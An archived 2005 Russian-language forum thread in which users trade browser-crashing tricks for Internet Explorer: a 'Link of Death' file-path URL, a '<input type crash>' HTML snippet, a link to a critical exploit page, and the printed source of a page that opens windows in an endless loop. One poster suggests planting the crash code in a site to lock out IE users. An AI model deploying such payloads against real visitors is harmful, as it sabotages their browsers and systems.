PDA

Просмотр полной версии : Ослик умер =((((


SladerNon
30.05.2005, 07:33
http://crapware.lx.ro/junkcode/security/ie-sp1-file-a0-crash.htm

Идем по ссылке, тыкаем на

Click Me - The Link Of Death!


И ваш IE успешно отбрасывает коньки!

P.S. вирусов нет.

JazzzSummerMan
30.05.2005, 08:14
Хм, не совсем понятно.
Ты сам пробовал?)
Там нет по ссылке скрипта, а только "file://*:/"
если IE и зависает при обработке такого пути(в чем сильно сомневаюсь), то не все версии и не во всех виндах. Да и нафиг это нужно, можно написать скрипт который окна генерирует, результат тот же. Другое дело - видел скрипт который вызывает синий экран, вешает ОС или отрубает от сети - вот это уже серьезнее)

SladerNon
30.05.2005, 08:27
Гыг =).
Работает =).
(Тестированно на WInXP SP2 со всеми майскими заплатками 2005 г. И на последней(на сегодняшний день версии IE).
6.0.2900.2180.xpsp2)
Посмотри на HTML код странички =)
Минимум, и со вкусом =).
Учитывая массовое использование ослика, вставляем код в нужный ресурс, и он становится недоступным, для поклонников IE =).
Ловкость рук и никакого мошеничества =)

Другое дело - видел скрипт который вызывает синий экран, вешает ОС или отрубает от сети - вот это уже серьезнее)

Я не только видел подобные творения, но и применял на практике =). Там часто срабатывает механизм:
Не везде, не при таких настройках и не всегда =)
Тока не думаю надо такие вещи сюда выкладывать =). Чебурашки Забанят =))))))

SladerNon
30.05.2005, 10:30
Просьба отписаться, если повис у Вас ваш Internet Explorer =)
Какая версия и на какой системе протестировали =).
Отписаться желательно даже тогда, когда не повис =).

Заранее благодарен.

SladerNon
30.05.2005, 10:52
Еще немного о браузерах =)

http://www.securityfocus.com/archive/1/319488/2003-04-22/2003-04-28/0
(описание).

Создайте файл и поместите туда код:

<html>
<form>
<input type crash>
</form>
</html>


=)

OLIVER
30.05.2005, 10:55
У меня Xp без сервис паков безовсяких обновлений и Ослик просто 6"вечно глючный"
Вполне спокойно открыл )

OLIVER
30.05.2005, 10:56
Хотя что насчёт ссылок то я их много видел и делал сам, от них не только Ie зависал))

SladerNon
30.05.2005, 11:06
У меня Xp без сервис паков безовсяких обновлений и Ослик просто 6"вечно глючный"

Как не аккуратно то по инету бегаешь =). айяйяй =))))

OLIVER
30.05.2005, 11:11
=)) самому страшно

JazzzSummerMan
30.05.2005, 12:14
вот пример посерьезнее) на секлабе уязвимости присвоили статус "критическая")
на ссылку ни в коем случае не кликать
hттp://www.securitylab.ru/_Exploits/2004/12/ie/aniblue.htm

Puff
30.05.2005, 12:50
Windows 2003 SP4 IE 6.0.2800.1106 SP1 + 5 пакетов заплаток разных!
Все работает, НО опасности практически нет, единственное то, что это если у человека было допустим много заходов куда нибудь, а тут зашел и ему выскакивает ошибка о неверно выполненой задаче и окно закрываеться! Тоесть уге кнопочку "назад" не нажать и искать пагу заного надо, если не знаешь полного пути к ней! Вот и все! А вобще интересно давольно таки!

j0y
01.06.2005, 22:54
по поводу Click Me - The Link Of Death! у меня здох и ие 6.0 при ос хп сп2, а также netscape 0.9.6.b

2SladerNon
что за майские заплатки ?

+toxa+
02.06.2005, 00:06
мой Firefox 1.0.4 после ссылки выжил!)

КероСиН
03.06.2005, 00:01
можно написать скрипт который окна генерирует,
Вот ссылочка www.dimanastr.chat.ru --- окна генерирует НЕ НАЖИМАЙТЕ!

Rebz
03.06.2005, 00:08
Хех.. я нажал.. проверил свой бразуер.. ну ничё таки.. =)
Жив остался)).
зы: блокировка окошек и попапов рулит)).

Puff
03.06.2005, 00:36
Вот ссылочка www.dimanastr.chat.ru (http://www.dimanastr.chat.ru/) --- окна генерирует НЕ НАЖИМАЙТЕ!

<SCRIPT LANGUAGE=JScript>
{
window.alert("hacked by Minsk Hack Club");
while(1)window.open("http://wwp.icq.com/scripts/search.dll?to=someUIN");
}
</SCRIPT>
<!-- ><!-- "><!-- '><!-- -->
</textarea></form></title></comment></a></div></span></ilayer></layer>
</iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<script language="JavaScript" src="<A href="http://www-banner.chat.ru/allshops.js"></script">http://www-banner.chat.ru/allshops.js"></script>
A B HTML CODe Ничерта умного и нового!
П.С. А че за минский хак клуб, кто нить слышал?! :)

Morph
03.06.2005, 06:13
Я слыхал про него.
И даже что то видел их сайт чтоли.

DRON-ANARCHY
04.06.2005, 21:33
Минские хакеры крутые кодеры!=)